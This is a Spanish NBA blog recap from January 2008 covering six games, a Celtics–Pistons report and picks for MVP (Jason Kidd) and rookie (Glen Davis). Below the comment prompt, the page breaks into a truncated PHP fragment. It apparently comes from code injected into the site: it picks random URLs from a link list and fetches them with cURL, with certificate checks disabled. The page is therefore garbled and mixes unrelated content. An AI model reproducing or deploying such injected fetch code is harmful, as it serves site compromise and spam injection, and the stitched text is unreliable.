La crónica (05/01/08)

06 de January de 2008 por Jabho

Seis partidos configuraban la jornada de anoche con duelos muy intereseantes. En Atlanta se enfrentaban dos equipos que aspiran a estar en Play Offs por la conferencia Este, Nets-Hawks. Ya lo dice el sabio refranero popular español “más vale maña que fuerza”. El 96º triple-doble en la carrera de Kidd pudo con el juego atlético de los Hawks que fueron por delante en muchos momentos. Kidd estuvo bien secundado por 5 jugadores que hicieron mas de 15 puntos cada uno. En Chicago se enfrentaban dos equipos con similar balance aunque distinta perspectiva, Kings-Bulls. Ganaron los Bulls gracias a un tiro libre a falta de unos segundos de Big Ben (promedia poco mas del 40%) y un tapón posterior a Brad Miller. Los Kings van cuesta abajo mientras que los Bulls poco a poco y sin Skiles remontan el vuelo. Los Rockets necesitados de victorias recibían a los Knicks y sus 12 partidos seguidos perdiendo como visitante. Ya son 13. Buen partido de Yao y duelo de dos de los jugadores mas bajitos de la liga: Nate Robinson y Aaron Brooks. Ambos hicieron un buen partido. Uno de los partidos de la jornada tenia lugar en Phoenix con dos de los gallitos de la conferencia Oeste Hornets-Suns, o lo que es lo mismo Paul-Nash. Ambos cuajaron un gran partido pero los Hornets estuvieron mejor secundados y se llevaron el gato al agua. Jazz – Trail Blazers disputaron un duelo con los papeles cambiados. Sloan sigue sin encontrar la clave para estos Jazz que recordemos jugaron la semifinal de conferencia el año pasado. Los Blazers por contra siguen con su buena racha y esta vez, con un mal partido de Roy, fueron Aldrige y Webster los que sacaron el partido adelante. La jornada concluye con el duelo por la supremacia en la conferencia Este. Boston superó a Detroit en un partido que comentaremos mas adelante.

Resultados

Nets 113 – 107 Hawks

Kings 93 – 94 Bulls

Knicks 91 – 103 Rockets

Hornets 118 – 113 Suns

Jazz 89 – 103 Trail Blazers

El partido de la noche

Celtics 92 – Pistons 85

Boston se presentaba al partido con 8 partidos seguidos ganados como visitante. Detroit le recibia con 7 partidos seguidos ganados como local. El partido tenia sabor a Play Offs y aire de revancha al ser los Pistons el único equipo capaz de ganar en Boston hasta la fecha.

El partido arrancó con 2 faltas personales muy tempraneras de Garnett. Eso le mandó el banco, y tras un buen incio verde, los Pistons tomaron el mando y acabaron el primer cuarto 12-22. McDyess también se habia ido al banco por personales, pero su suplente Maxiel jugó a gran nivel dominando ambas zonas en este momento. La segunda unidad de Boston y la vuelta al partido de Garnett equilibraron el partido al descanso.

Trás la reanudación el partido fue equilibrado en todo momento. Con Ray Allen en un momento bajo de forma y Garnett con problemas de faltas, Pierce comandó a los Celtics durante gran parte del partido. Por parte de los Pistons algunos buenos momentos de Sheed y Billups mantenian al equipo arriba. De todas formas y como era de esperar entre estos dos equipos el partido se jugaba más en defensa que en ataque. El último cuarto empezó igualado y a los problemas de faltas de Garnett se unieron los de Ray Allen para los Celtics. En ese cuarto emergió la figura del novato Glen Davis, que venia haciendo un buen partido peleando cada bola que pasaba por su lado, y con la buena dirección de Pierce y la aportación de Garnett en algunos momentos, superaron a los Pistons. Por parte de Detroit, especialista en finales igualados, sólo Hamilton estuvo entonado al final del partido.

Victoria importante para Boston, mas por su valor moral al ser ante su principal rival en la lucha por la final. Dos equipos que probablemente se vean las caras en Mayo.

Nuestro MVP de la noche: había mucho para elegir anoche (Paul, Josh Smith, Carter,…) pero nos quedamos con jugador inteligente y competitivo como pocos: Jason Kidd. Anoche no estuvo afortunado en el tiro y con 3 de 11 hizo justo 10 puntos. Pero añadió 14 asistencias, 13 rebotes y 3 robos y fue el gran “culpable” de que 5 jugadores de los Nets hicieran mas de 15 puntos.

El rookie de la noche: buenas actuaciones de novatos que no estuvieron en los primeros puestos del draft. Aaron Brooks jugó bien y Sean Williams continuó con la buena marcha de esta temporada. Sin embargo elegimos como mejor rookie a Glen Davis. 20 puntos con 8-10 en tiro, muchos de ellos en el decisivo último cuarto del partido ante los Pistons, 4 rebotes, mucha lucha y mucho trabajo. Valor añadido porque la zona de Detroit es de las más difíciles de la liga. Por primera vez en la temporada alguien que no es Allen, Pierce o Garnett acaba como máximo anotador del equipo.

La sopresa de la noche: empezó la temporada muy bien, se había desinflado un poco y anoche volvió a sus grandes partidos de incio, Martell Webster. Sus números de anoche 26 puntos, 6 rebotes y 3 asistencias. Más alternativas para los soprendentes Trail Blazers.

La decepción de la noche: Joe Johnson jugó mal para los Hawks, pero la decepción de anoche es para Carlos Boozer. Lleva, después de la lesión, dos temporadas a gran novel, pero anoche estuvo muy desacertado y los Jazz lo necesitan.

Os dejamos conlas diez mejores jugadas de anoche:

 

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>